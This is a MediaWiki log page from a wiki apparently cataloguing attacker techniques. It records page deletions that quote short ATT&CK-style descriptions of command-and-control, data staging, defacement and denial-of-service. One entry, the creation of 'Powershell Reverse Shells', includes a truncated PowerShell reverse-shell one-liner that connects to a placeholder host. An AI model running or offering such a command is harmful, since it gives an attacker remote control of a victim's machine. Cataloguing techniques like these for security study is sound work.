Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 13:15, 28 January 2023 SourMilk talk contribs deleted page Bidirectional Communication (content was: "Category:Web Service Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those c...", and the only contributor was "SourMilk" (talk))
- 13:15, 28 January 2023 SourMilk talk contribs deleted page Dead Drop Resolver (content was: "Category:Web Service Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redi...", and the only contributor was "SourMilk" (talk))
- 13:15, 28 January 2023 SourMilk talk contribs deleted page One-Way Communication (content was: "Category:Web Service Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from...", and the only contributor was "SourMilk" (talk))
- 13:14, 28 January 2023 Ali3nw3rx talk contribs created page Powershell Reverse Shells (Created page with "==Powershell Reverse Shells<ref>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell</ref>== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName...")
- 13:14, 28 January 2023 SourMilk talk contribs deleted page Standard Encoding (content was: "Category:Data Encoding Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, B...", and the only contributor was "SourMilk" (talk))
- 13:14, 28 January 2023 SourMilk talk contribs deleted page Non-Standard Encoding (content was: "Category:Data Encoding Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or re...", and the only contributor was "SourMilk" (talk))
- 13:14, 28 January 2023 SourMilk talk contribs deleted page Remote Data Staging (content was: "Category:Data Staged Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy dat...", and the only contributor was "SourMilk" (talk))
- 13:14, 28 January 2023 SourMilk talk contribs deleted page Local Data Staging (content was: "Category:Data Staged Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging...", and the only contributor was "SourMilk" (talk))
- 13:14, 28 January 2023 SourMilk talk contribs deleted page Network Device Configuration Dump (content was: "Category:Data from Configuration Repository Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on...", and the only contributor was "SourMilk" (talk))
- 13:14, 28 January 2023 SourMilk talk contribs deleted page SNMP (MIB Dump) (content was: "Category:Data from Configuration Repository Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).", and the only contributor was "SourMilk" (talk))
- 13:13, 28 January 2023 Ali3nw3rx talk contribs created page Category:Reverse Shells (Created page with "category:Initial Access")
- 13:13, 28 January 2023 SourMilk talk contribs deleted page Confluence (content was: "Category:Data from Information Repositories Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:", and the only contributor was "SourMilk" (talk))
- 13:13, 28 January 2023 SourMilk talk contribs deleted page Sharepoint (content was: "Category:Data from Information Repositories Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential v...", and the only contributor was "SourMilk" (talk))
- 13:13, 28 January 2023 SourMilk talk contribs deleted page Internal Defacement (content was: "Category:Defacement An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper. Disturbing or offensive images may be used as a part of Inter...", and the only contributor was "SourMilk" (talk))
- 13:13, 28 January 2023 SourMilk talk contribs deleted page External Defacement (content was: "Category:Defacement An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. External Defacement may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often target...", and the only contributor was "SourMilk" (talk))
- 13:13, 28 January 2023 SourMilk talk contribs deleted page Symmetric Cryptography (content was: "Category:Encrypted Channel Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES,...", and the only contributor was "SourMilk" (talk))
- 13:12, 28 January 2023 SourMilk talk contribs deleted page Asymmetric Cryptography (content was: "Category:Encrypted Channel Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to...", and the only contributor was "SourMilk" (talk))
- 13:11, 28 January 2023 SourMilk talk contribs deleted page Disk Structure Wipe (content was: "Category:Disk Wipe Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.", and the only contributor was "SourMilk" (talk))
- 13:11, 28 January 2023 SourMilk talk contribs deleted page Disk Content Wipe (content was: "Category:Disk Wipe Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.", and the only contributor was "SourMilk" (talk))
- 13:11, 28 January 2023 SourMilk talk contribs deleted page Direct Network Flood (content was: "Category:Network Denial of Service Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Direct Network Floods are when one or more systems are used to send a high-volume of network packets towar...", and the only contributor was "SourMilk" (talk))
- 13:11, 28 January 2023 SourMilk talk contribs deleted page Reflection Amplification (content was: "Category:Network Denial of Service Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accom...", and the only contributor was "SourMilk" (talk))
- 13:10, 28 January 2023 SourMilk talk contribs deleted page Purchase Technical Data (content was: "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark...", and the only contributor was "Ali3nw3rx" (talk))
- 13:10, 28 January 2023 SourMilk talk contribs deleted page Threat Intel Vendors (content was: "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding bre...", and the only contributor was "Ali3nw3rx" (talk))
- 13:10, 28 January 2023 SourMilk talk contribs deleted page Launchctl (content was: "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.[1] Adversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons. Common subcomman...", and the only contributor was "Ali3nw3rx" (talk))
- 13:10, 28 January 2023 SourMilk talk contribs deleted page Service Execution (content was: "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.[1] The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net. PsExec can also be used to execute commands...", and the only contributor was "Ali3nw3rx" (talk))
- 13:10, 28 January 2023 SourMilk talk contribs deleted page Socket Filters (content was: "Category:Traffic Signaling Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to...", and the only contributor was "SourMilk" (talk))
- 13:10, 28 January 2023 SourMilk talk contribs deleted page Port Knocking (content was: "Category:Traffic Signaling Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by cus...", and the only contributor was "SourMilk" (talk))
- 13:10, 28 January 2023 SourMilk talk contribs deleted page Domains (content was: "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for Phishing, Drive-by Compromise, and Command and Control.[1] Adversaries may choose...", and the only contributor was "Ali3nw3rx" (talk))
- 13:09, 28 January 2023 SourMilk talk contribs deleted page Spearphishing via Service (content was: "Category:Phishing", and the only contributor was "SourMilk" (talk))
- 13:08, 28 January 2023 Ali3nw3rx talk contribs created page Category:Impact (Created blank page) Tag: Visual edit
- 13:06, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Defacement (Mass deletion of pages added by SourMilk)
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Proxy (content was: "Category:Command and Control Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMa...", and the only contributor was "SourMilk" (talk))
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Encrypted Channel (content was: "Category:Command and Control Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware sampl...", and the only contributor was "SourMilk" (talk))
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Collection (Mass deletion of pages added by SourMilk)
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Data Obfuscation (content was: "Category:Command and Control Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompass...", and the only contributor was "SourMilk" (talk))
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Data Manipulation (Mass deletion of pages added by SourMilk)
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Impact (Mass deletion of pages added by SourMilk)
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Application Layer Protocol (content was: "Category:Command and Control Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.", and the only contributor was "SourMilk" (talk))
- 13:05, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Endpoint Denial of Service (Mass deletion of pages added by SourMilk)
- 13:04, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Network Denial of Service (Mass deletion of pages added by SourMilk)
- 13:04, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Disk Wipe (Mass deletion of pages added by SourMilk)
- 13:04, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Web Service (Mass deletion of pages added by SourMilk)
- 13:04, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Data Encoding (Mass deletion of pages added by SourMilk)
- 13:03, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Dynamic Resolution (Mass deletion of pages added by SourMilk)
- 13:02, 28 January 2023 SourMilk talk contribs created page Category:Lateral Movement (Created blank page) Tag: Visual edit
- 13:02, 28 January 2023 SourMilk talk contribs created page Category:Discovery (Created blank page) Tag: Visual edit
- 13:02, 28 January 2023 SourMilk talk contribs created page Category:Credential Access (Created blank page) Tag: Visual edit
- 13:01, 28 January 2023 SourMilk talk contribs created page Category:Defense Evasion (Created blank page) Tag: Visual edit
- 13:01, 28 January 2023 Ali3nw3rx talk contribs deleted page Data from Cloud Storage (content was: "Category:Collection Adversaries may access data from improperly secured cloud storage.", and the only contributor was "SourMilk" (talk))
- 13:01, 28 January 2023 Ali3nw3rx talk contribs deleted page Clipboard Data (content was: "Category:Collection Adversaries may collect data stored in the clipboard from users copying information within or between applications.", and the only contributor was "SourMilk" (talk))